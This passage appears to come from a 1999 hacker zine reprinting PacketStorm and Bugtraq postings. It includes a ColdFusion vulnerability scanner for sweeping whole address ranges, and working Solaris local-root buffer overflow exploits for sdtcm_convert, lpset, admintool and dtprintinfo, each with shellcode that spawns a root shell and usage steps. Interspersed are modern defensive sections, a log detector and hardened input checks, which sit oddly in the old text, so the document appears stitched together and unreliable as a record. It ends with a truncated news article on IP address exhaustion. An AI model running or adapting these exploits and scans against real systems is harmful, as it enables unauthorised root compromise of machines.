~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*
Quickie Coldfusion exploit finder v1.0

After seeing all the super lame hacks by groups desperately seeking media wh0rage, like
JPs new favorite group, Team spl0it, and all the lame crap they were using, I decided
to help them in their quest to look lame. Most of the 'tools' these people were
releasing were nothing more than modified versions of my cgiscanner (cgiscan.c), so
here is a newly coded, faster scanner for them to use and rip off. If I find this code,
like the rest of my code, on JPs code site, with my name cleverly removed, I am going
to go take a shit on the hood of his car.

This should also give McIntyre and Jericho some more sites to put in their hacked site
archive on attrition.org that JP can rip off to. They have already shit on his car.

This scanner scans an entire class C address, and does it with no bull. Enter the
starting IP address, then the one you want to to stop on, and it will scan each box for
the 3 parts of the bug.

complies on HP-UX, Linux, *BSD

to compile:
luser$ gcc quickie.c -o quickie

to run:
luser$ ./quickie 123.123.123.2 123.123.123.254 >> somelog &

coded by Bronc Buster
May 1999

*/


#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
/* sets the timeout for connect() - you can change it if you want */
#define TOUT 2

/*****************************************************/
/* begin eLe3t prototypes */
/*****************************************************/

void phalse(int signo);
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec);
void clean(char b[1024]);

/*****************************************************/
/* end eLe3t prototypes */
/*****************************************************/

int main(int argc, char **argv)
{

char *temp;
char *ip_ptr;
char buff[1024]; /* who cares, we only want to HTTP header */
int f1,f2,f3,f4; /* f1.f2.f3.f4 when we disassemble first IP */
int l1,l2,l3,l4; /* l1.l2.l3.l4 when we disassemble last IP */
int i, tmp, n, lame;
int sock;
struct sockaddr_in target;
char *coldf[4];
char *dis[4];

/* this is just for a pretty print */
    dis[1] = "openfile.cfm";
    dis[2] = "exprcalc.cfm";
    dis[3] = "displayopenedfile.cfm";

    /* checks for coldfusion bugs */
    coldf[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
    coldf[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
    coldf[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";


    if(argc<2) exit(printf("\nUsage: %s start_ip ending_ip\n",argv[0]));

    printf("\n** A fast coldfusion exploit finder **");
    printf("\ncoded by Bronc Buster - May 99\n");

    /* parse ripped from HoGs HeaD domain scanner with a little */
    /* modification - works good */
    /* parse first ip - sorry no error checking */
    temp=argv[1];
    ip_ptr=(char *)strtok(temp,".");   /* get first field and look for . */
    f1=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    f2=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    f3=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    f4=atoi(ip_ptr);

    /* parse second ip */
    temp=argv[2];
    ip_ptr=(char *)strtok(temp,".");   /* get first field and look for . */
    l1=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    l2=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    l3=atoi(ip_ptr);
    ip_ptr=(char *)strtok(NULL,".");   /* null pointer set, get next field */
    l4=atoi(ip_ptr);
    /* end parsing */

    /* class C range checking - morons 'might' use the - hehehe */
    if(f4<2 || l4>254)
        exit(printf("IP Numbers out of range\n"));

    /* class C only - anyone with a brain can make */
    /* this scan class B or A nets - wow kidiez! */
    for (i=f4;i<=l4;i++)
    {
        /* reconstruct the IP into a string */
        sprintf(temp,"%d.%d.%d.%d",f1,f2,f3,i);

        bzero(&target,sizeof(target));
        target.sin_addr.s_addr=inet_addr(temp);
        target.sin_family=AF_INET;
        target.sin_port=htons(80);

        /* ok, so this is a lame loop */
        for(lame=1;lame;lame--)
        {
            printf("\nChecking %s:",temp);

            /* check for all 3 before we jump for joy */
            for(n=1;n<4;n++)
            {
                sock=socket(AF_INET,SOCK_STREAM,0);
                if(sock<0)
                    exit(printf("Error getting socket - socket()\n"));
                if(connect_time(sock,(struct sockaddr *)&target,sizeof(target),TOUT)==-1)
                {
                    close(sock);
                    printf("\n no HTTPD responce");
                }
                else
                {
                    printf("\n checking for %s - ",dis[n]);
                    send(sock,coldf[n],strlen(coldf[n]),0);
                    recv(sock, buff, sizeof(buff),0);
                    if(strstr(buff,"200"))
                    {
                        close(sock);
                        clean(buff);
                        printf("FOUND",dis[n]);
                    }
                    else
                    {
                        close(sock);
                        clean(buff);
                        printf("not found",dis[n]);
                    }
                }
            }
        }
    }

    printf("\n\nScan finished!\n");
    printf("Have fun kiddies!\n");
return 0;

}

/**************************************************************/
/* eLe3t functions */
/**************************************************************/
/* fake return function for connect_time() */
void phalse(int signo)
{
return;
}

/* connect with timeout - for speed!@$(*%^@ */
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec)
{
int s;
alarm(0);
signal(SIGALRM,phalse);
alarm(nsec);

if((s=connect(sockfd,(struct sockaddr *)saptr,salen))<0)
{
close(sockfd);
if(errno==EINTR);
errno=ETIMEDOUT;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
return (s);
}

/* clean out buffer so we don't get fake readings */
void clean(char b[1024])
{
int i;
for(i=0;i<=strlen(b);i++)
b[i]=NULL;
}

/* EOF */
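The defender's counterpart to the scanner above is spotting the sweep in the web server's own logs and, more importantly, confirming whether the ColdFusion sample applications under /cfdocs are still installed (a 200 answer to any of the three probes). The following is an added example written for this page, not code from the zine, PacketStorm or Bronc Buster: it parses constructed Common Log Format lines (the IPs, timestamps and sizes are made up), records which of the three sample pages each client requested and which were served, and flags clients that probed two or more of them. The thresholds (two distinct probes, 64 tracked clients) are assumptions chosen for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NPROBES 3
#define MAX_CLIENTS 64

/* The three sample pages the scanner above requests; a client asking for two
 * or more of them is sweeping for the ColdFusion sample applications. */
static const char *probe_paths[NPROBES] = {
    "/cfdocs/expelval/openfile.cfm", "/cfdocs/expelval/exprcalc.cfm",
    "/cfdocs/expelval/displayopenedfile.cfm" };

/* Constructed sample access log in Common Log Format; not real traffic. */
static const char *sample_log[] = {
    "10.0.0.7 - - [15/May/1999:10:01:02 -0400] \"GET /index.html HTTP/1.0\" 200 1234",
    "192.0.2.44 - - [15/May/1999:10:01:05 -0400] \"GET /cfdocs/expelval/openfile.cfm HTTP/1.0\" 200 512",
    "192.0.2.44 - - [15/May/1999:10:01:05 -0400] \"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\" 200 640",
    "192.0.2.44 - - [15/May/1999:10:01:06 -0400] \"GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\" 404 210",
    "10.0.0.9 - - [15/May/1999:10:02:00 -0400] \"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\" 200 640",
    "10.0.0.9 - - [15/May/1999:10:02:30 -0400] \"GET /shop/cart.cfm HTTP/1.0\" 200 2048" };
#define SAMPLE_LINES (sizeof sample_log / sizeof sample_log[0])

struct client {
    char ip[16];
    unsigned seen;     /* bitmask of probe paths this client requested */
    unsigned served;   /* subset of seen that the server answered with 200 */
};

/* Pull client IP, request path and status code out of one CLF line.
 * Returns 1 on success, 0 if the line does not have the expected shape. */
int parse_clf(const char *line, char ip[16], char path[256], int *status)
{
    const char *sp = strchr(line, ' '), *q1, *q2, *m, *pe;
    size_t plen;
    if (sp == NULL || (size_t)(sp - line) >= 16) return 0;
    memcpy(ip, line, sp - line);
    ip[sp - line] = '\0';
    q1 = strchr(sp, '"');                      /* opens "METHOD PATH VERSION" */
    q2 = q1 ? strchr(q1 + 1, '"') : NULL;      /* closes it */
    m = q1 ? strchr(q1 + 1, ' ') : NULL;       /* blank after METHOD */
    if (q2 == NULL || m == NULL || m >= q2) return 0;
    pe = strchr(m + 1, ' ');                   /* blank after PATH, else the quote */
    if (pe == NULL || pe > q2) pe = q2;
    plen = (size_t)(pe - (m + 1));
    if (plen == 0 || plen >= 256) return 0;
    memcpy(path, m + 1, plen);
    path[plen] = '\0';
    *status = atoi(q2 + 1);                    /* atoi skips the blank before the code */
    return 1;
}

/* Index of the probe path that path starts with, or -1. */
static int probe_index(const char *path)
{
    int i;
    for (i = 0; i < NPROBES; i++)
        if (strncmp(path, probe_paths[i], strlen(probe_paths[i])) == 0) return i;
    return -1;
}

static int bits(unsigned m) { int c = 0; for (; m; m >>= 1) c += (int)(m & 1u); return c; }

/* Returns how many clients requested at least min_probes distinct sample pages
 * and copies them into hits. *exposed is set when any probe was answered 200,
 * i.e. the sample applications are still installed; the server-side fix is to
 * remove /cfdocs from production web roots. */
int detect_cf_sweep(const char *const *lines, size_t nlines, int min_probes,
                    struct client *hits, int max_hits, int *exposed)
{
    struct client tab[MAX_CLIENTS], *c;
    int ntab = 0, nhits = 0, status, p, i;
    size_t k;
    char ip[16], path[256];

    *exposed = 0;
    for (k = 0; k < nlines; k++) {
        if (!parse_clf(lines[k], ip, path, &status)) continue;
        if ((p = probe_index(path)) < 0) continue;
        for (c = tab; c < tab + ntab && strcmp(c->ip, ip) != 0; c++) ;
        if (c == tab + ntab) {                    /* first probe from this client */
            if (ntab == MAX_CLIENTS) continue;    /* table full: drop it */
            memset(c, 0, sizeof *c);
            strcpy(c->ip, ip);                    /* at most 15 chars, checked in parse_clf */
            ntab++;
        }
        c->seen |= 1u << p;
        if (status == 200) { c->served |= 1u << p; *exposed = 1; }
    }
    for (i = 0; i < ntab && nhits < max_hits; i++)
        if (bits(tab[i].seen) >= min_probes) hits[nhits++] = tab[i];
    return nhits;
}

/* Helpers over the constructed log: number of alerting clients, and the
 * probed (served == 0) or served (served == 1) bitmask of one client. */
int sample_alert_count(int min_probes)
{
    struct client hits[MAX_CLIENTS]; int exposed;
    return detect_cf_sweep(sample_log, SAMPLE_LINES, min_probes, hits, MAX_CLIENTS, &exposed);
}
unsigned sample_mask(const char *ip, int served)
{
    struct client hits[MAX_CLIENTS]; int exposed, n, i;
    n = detect_cf_sweep(sample_log, SAMPLE_LINES, 1, hits, MAX_CLIENTS, &exposed);
    for (i = 0; i < n; i++)
        if (strcmp(hits[i].ip, ip) == 0) return served ? hits[i].served : hits[i].seen;
    return 0;
}

int main(void)
{
    struct client hits[MAX_CLIENTS];
    int exposed, i, n = detect_cf_sweep(sample_log, SAMPLE_LINES, 2, hits, MAX_CLIENTS, &exposed);
    for (i = 0; i < n; i++)
        printf("sweep from %s: probed %#x, served %#x\n", hits[i].ip, hits[i].seen, hits[i].served);
    if (exposed) printf("sample apps answered 200: remove /cfdocs from this server\n");
    return 0;
}
```

On the constructed log, 192.0.2.44 is reported (it asked for all three pages, two of which were served), 10.0.0.9 is not (one probe only), and the exposure flag is set because the sample pages answered 200; the 404 on the third request shows why the served mask matters more than the seen mask when deciding what to fix on the server.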


@HWA

33.0 sdtcm_convert local root overflow exploit for Sparc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*=============================================================================
sdtcm_convert Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)

[usage]
% gcc ex_sdtcm_convert.c (This example program)
% a.out
If no response, hit ctrl+c
#
=============================================================================
*/

#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30

#define NOP 0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
int i;

main()
{
    static char x[11000];

    memset(x,'a',10000);
    ret_adr=get_sp()-6300;
    for (i = 0; i < 5000 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    ret_adr=get_sp() - 10200;
    if ((ret_adr & 0xff )==0) ret_adr+=4;
    printf("%lx\n",ret_adr);
    for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i];
    x[10000]=0;
    execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
}


@HWA


34.0 lpset local root overflow exploit for x86
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*=============================================================================
ex_lpset.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_lpset.c (This example program)
% a.out
#
=============================================================================
*/

#define ADJUST 3
#define OFFSET 0x3b88
#define STARTADR 700
#define ENDADR 1200
#define EX_STADR 8000
#define BUFSIZE 22000

#define NOP 0x90

unsigned long ret_adr;
int i;

char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
"\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
"\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
"\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
"\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
"\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
"\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax ");
}

static char x[BUFSIZE];

main(int argc, char **argv)
{
    memset(x,NOP,18000);
    ret_adr=get_sp()-OFFSET;
    printf("Jumping Address = 0x%lx\n",ret_adr);
    for (i = ADJUST+STARTADR; i<ENDADR ; i+=4){
        x[i+2]=ret_adr & 0xff;
        x[i+3]=(ret_adr >> 8 ) &0xff;
        x[i+0]=(ret_adr >> 16 ) &0xff;
        x[i+1]=(ret_adr >> 24 ) &0xff;
    }
    for (i=0;i<strlen(exploit_code);i++) x[i+EX_STADR]=exploit_code[i];
    x[5000]='=';
    x[18000]=0;
    execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
}


@HWA

35.0 admintool local root exploit for solaris x86 machines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

/*=============================================================================
admintool Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0)
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#

In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/

#include <stdio.h>


#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400

#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"

#define NOP 0xa61cc013

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;

main()
{
    system(PKGDIR);
    putenv("LANG=");
    if ((fp=fopen(PKGMAP,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGMAP);
        exit(1);
    }
    fclose(fp);

    if ((fp=fopen(PKGINFO,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGINFO);
        exit(1);
    }
    fprintf(fp,"PKG=");

    ret_adr=get_sp()-OFFSET;
    while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
        ret_adr += 4;

    printf("Jumping address = %lx\n",ret_adr);
    memset(x,'a',4);
    for (i = ADJUST1; i < 1000; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >>8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE1]=0;
    fputs(x,fp);
    fprintf(fp,"\n");

    fprintf(fp,"NAME=");
    memset(x,'a',4);
    for (i = ADJUST2; i < BUFSIZE2; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0; i<strlen(exploit_code); i++)
        x[i+ADJUST2+OFFSET2]=exploit_code[i];
    x[BUFSIZE2]=0;
    fputs(x,fp);
    fprintf(fp,"\n");

    fprintf(fp,"VERSION=1.00\n");
    fprintf(fp,"ARCH=sparc\n");
    fprintf(fp,"CLASSES=none\n");
    fprintf(fp,"CATEGORY=application\n");
    fprintf(fp,"PSTAMP=990721\n");
    fprintf(fp,"BASEDIR=/\n");
    fclose(fp);
    system("admintool");
}

@HWA

36.0 dtprintinfo buffer overflow exploit for solaris x86 machines..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 10 May 1999 02:12:29 JST
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Solaris2.6,2.7 dtprintinfo exploits

Hello.

"dtprintinfo" is a suid program; the stack buffer can be overflowed by the '-p'
option. I made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris 2.7.
Please test it.
If you test this program, please set DISPLAY environment correctly
before execution.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax ");
}
main()
{
    putenv("LANG=");
    for (i=0;i<BUFSIZE;i++) x[i]=NOP;
    for (i=0;i<strlen(exploit_code);i++)
        x[STARTADR+i]=exploit_code[i];
    ret_adr=get_sp() - 1292 + 148;
    for (i = ADJUST; i < 400 ; i+=4){
        x[i+0]=ret_adr & 0xff;
        x[i+1]=(ret_adr >> 8 ) &0xff;
        x[i+2]=(ret_adr >> 16 ) &0xff;
        x[i+3]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE]=0;
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
          "-p",x,(char *) 0);
}

--------------------------------------------------------------------

Date: Mon, 10 May 1999 13:15:36 JST
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]

Sorry, I forgot to write the following things...

Before execution of dtprintinfo exploit, please make a dummy
lpstat command.

for example,

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out


Following exploit program is for Sparc Solaris.
I tested on Solaris2.6.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#define ADJUST 0
#define OFFSET 1144
#define STARTADR 724
#define BUFSIZE 900
#define NOP 0xa61cc013
static char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}
main()
{
    putenv("LANG=");
    for (i = 0; i < ADJUST; i++) x[i]=0x11;
    for (i = ADJUST; i < 900; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
    ret_adr=get_sp()-OFFSET;
    printf("jumping address : %lx\n",ret_adr);
    if ((ret_adr & 0xff) ==0 ){
        ret_adr -=16;
        printf("New jumping address : %lx\n",ret_adr);
    }
    for (i = ADJUST; i < 600 ; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >> 8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE]=0;
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}


The Shadow Penguin Security
(http://base.oc.to/skyscraper/byte/551)
UNYUN (unewn4th@usa.net)
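Sections 33.0 through 36.0 all attack the same defect: a setuid program copies an option value (-d, -a, -p, or a pkginfo field) into a fixed-size stack buffer without checking its length, so an argument of 900 to 18000 bytes built from a repeated return address, a sled of NOPs and a payload overwrites the saved return address. The following is an added example written for this page, not code from the zine or from Shadow Penguin Security, and the vulnerable function in it is a constructed illustration of the bug class, not the vendor's source (which the page does not show). It shows the bounded, printable-only replacement a maintainer would write for such an option, and a heuristic a reviewer can run over recorded command lines of setuid programs (process accounting, audit trails) to spot arguments shaped like these buffers. The name-length limit of 63 and the review thresholds (256 bytes, 25% non-printable, a run of 16 repeated words) are assumptions chosen for the example; the 4-byte filler word is a placeholder, not an address or instruction.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Longest value an option such as -p, -d or -a is allowed to carry (assumed).
 * The listings above pass 900 to 18000 bytes into options sized for a name. */
#define NAME_MAX_LEN 63

struct opts { char name[NAME_MAX_LEN + 1]; };

/* Shape of the bug all four listings attack, constructed for illustration
 * (assumed, not the vendor's code): the option value is copied into a fixed
 * stack buffer with no length check, so a long value runs past the buffer
 * into the saved registers and return address. Never called here. */
void legacy_set_name(const char *arg)
{
    char name[NAME_MAX_LEN + 1];
    strcpy(name, arg);
    (void)name;
}

/* Hardened replacement: bounded length, printable bytes only (the payloads
 * above are mostly bytes no printer, calendar or package name needs).
 * Returns 0 and fills o->name, or -1 and leaves o->name untouched. */
int set_name_checked(struct opts *o, const char *arg)
{
    size_t n, i;
    for (n = 0; n <= NAME_MAX_LEN && arg[n] != '\0'; n++) ;
    if (n > NAME_MAX_LEN) return -1;               /* too long, 64 bytes included */
    for (i = 0; i < n; i++)
        if (!isprint((unsigned char)arg[i])) return -1;
    memcpy(o->name, arg, n);
    o->name[n] = '\0';
    return 0;
}

/* Accept (1) / reject (0) verdict for one value, for main() and the test. */
int name_accepted(const char *arg)
{
    struct opts o;
    return set_name_checked(&o, arg) == 0;
}

/* Review heuristic for recorded command lines of setuid programs: the
 * argument buffers built above are long, repeat one 4-byte word many times
 * (return address, then NOP sled) and are mostly non-printable.
 * Returns 1 if arg has that shape, 0 otherwise. */
int looks_like_overflow_payload(const unsigned char *arg, size_t len)
{
    size_t i, nonprint = 0, run = 1, longest = 1;
    if (len < 256) return 0;                       /* no real name is this long */
    for (i = 0; i < len; i++)
        if (!isprint(arg[i])) nonprint++;
    for (i = 4; i + 4 <= len; i += 4) {            /* longest run of one repeated word */
        if (memcmp(arg + i, arg + i - 4, 4) == 0) { if (++run > longest) longest = run; }
        else run = 1;
    }
    return nonprint * 4 > len || longest >= 16;    /* >25% non-printable, or a sled */
}

/* Fills buf the way the listings fill theirs: one 4-byte word repeated end to
 * end. The word is a constructed placeholder, not an address or instruction.
 * Returns the number of bytes written. */
size_t build_sample_payload(unsigned char *buf, size_t size)
{
    static const unsigned char word[4] = { 0xde, 0xad, 0xbe, 0xef };
    size_t i;
    for (i = 0; i + 4 <= size; i += 4) memcpy(buf + i, word, 4);
    return i;
}

int sample_payload_flagged(void)
{
    unsigned char buf[1024];
    size_t n = build_sample_payload(buf, sizeof buf);
    return looks_like_overflow_payload(buf, n);
}

/* A long but ordinary printable value: must not trip the heuristic. */
int sample_long_text_flagged(void)
{
    unsigned char buf[1024];
    size_t i;
    for (i = 0; i < sizeof buf; i++) buf[i] = (unsigned char)('a' + i % 26);
    return looks_like_overflow_payload(buf, sizeof buf);
}

int main(void)
{
    printf("lpcol1 accepted: %d\n", name_accepted("lpcol1"));
    printf("constructed payload flagged: %d\n", sample_payload_flagged());
    printf("long plain text flagged: %d\n", sample_long_text_flagged());
    return 0;
}
```

The length check rejects the value before anything is copied, which is the whole fix; the printable-bytes rule is an extra layer that also rejects short values carrying binary, and the review heuristic is only useful after the fact, for deciding whether a long argument in an accounting record was a real name or one of these buffers. The remediation the Bugtraq posts imply is the usual one for this bug class: patch or remove the setuid bit from the affected programs.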

@HWA

37.0 Are we running out of IP numbers? How many class C's are left?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Net number system at a crossroads
By Dan Goodin and Courtney Macavinta
Staff Writers, CNET News.com
NEWS.COM
May 12, 1999, 4 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,36425,00.html

Special feature: Alongside the highly public debate over domain names, a little-understood predicament--with
more far-reaching consequences--is confronting the new nonprofit corporation in charge of the Net's
administration.

Forget about ".com." The critical resource under the Net's hood is numerical addresses, and the Internet
Corporation for Assigned Names and Numbers now is in charge of those, too.

Every online device or computer needs an Internet Protocol (IP) numerical address to connect to the global
network. When the system was being designed, hardly anyone imagined that its 4.2 billion unique addresses
would ever be exhausted. Just a few decades later, however, some in the technical community fear that the rapid
pace of innovation one day may cause the Net to run out of numbers.

